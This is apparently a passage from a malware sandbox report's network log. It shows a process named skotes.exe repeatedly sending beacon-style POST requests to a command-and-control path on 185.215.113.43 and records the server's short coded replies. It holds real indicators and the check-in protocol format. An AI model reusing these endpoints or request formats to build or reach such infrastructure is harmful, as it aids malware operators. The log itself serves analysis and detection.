                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:06.429641962 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.549818185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.059417963 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:09.543158054 CET287INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 36 31 0d 0a 20 3c 63 3e 31 30 30 38 30 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 65 31 62 66 65 39 64 31 31 32 34 36 31 31 36 32 61 66 34 35 32 66 63 63 61 64 65 62 32 66 62 62 63 62 37 63 34 37 32 64 64 35 32 34 64 62 33 35 32 66 30 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 61 <c>1008029001+++b5937c1ad0c0f9c34e1bfe9d112461162af452fccadeb2fbbcb7c472dd524db352f002415450#<d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.549880185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:35.907192945 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 31
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 64 31 3d 31 30 30 38 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                    Data Ascii: d1=1008029001&unit=246122658369
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:37.300508022 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.549889185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:39.184993029 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:40.557570934 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.549899185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:42.198776960 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:43.534687996 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.549906185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:45.276751995 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:46.711678028 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.549914185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:48.351548910 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:49.727015018 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.549922185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:51.495536089 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:52.919346094 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    8192.168.2.549930185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:54.543281078 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.924493074 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.549950185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:57.920293093 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:59.344305992 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:12:59 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    10192.168.2.549963185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:01.020077944 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    11192.168.2.549987185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:06.775394917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:08.205435991 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    12192.168.2.550010185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:09.834914923 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:11.215605021 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:10 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    13192.168.2.550033185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:12.971307993 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.410876036 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    14192.168.2.550046185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.047354937 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:17.390492916 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:17 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    15192.168.2.550053185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133815050 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:20.571755886 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    16192.168.2.550059185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.216917038 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
